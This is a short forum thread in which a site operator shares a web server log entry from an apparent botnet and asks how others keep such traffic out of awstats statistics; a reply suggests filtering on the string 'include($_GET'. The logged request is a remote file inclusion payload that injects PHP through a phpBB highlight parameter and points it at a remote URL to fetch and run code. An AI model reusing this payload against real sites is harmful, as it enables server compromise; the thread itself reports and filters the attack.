For months now, I have been seeing attacks that are trying to inject php from other sites through the URL that is passed. Here is an example log:

Code:

syslog.org:80.219.159.57 - - [28/Apr/2008:21:48:14 -0400] "GET /forum/index.php?topic=82.0//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????

I get tens of thousands of these per day across many sites. They come from hundreds of different IP's, with each IP only used a few times. Clearly, the source of the requests is a botnet, and they are essentially "fuzz testing" the sites.

The most pragmatic issue I have with this is that I believe it junks up the stats in tools like awstats. Are other people seeing this, and how are you handling it?

In awstats config you can filter it during stats generation to leave out url's with specific strings so set the filter not to include any containing "include($_GET".

I cant remember the option of the top of my head, however its in the docs and I have used it in the past.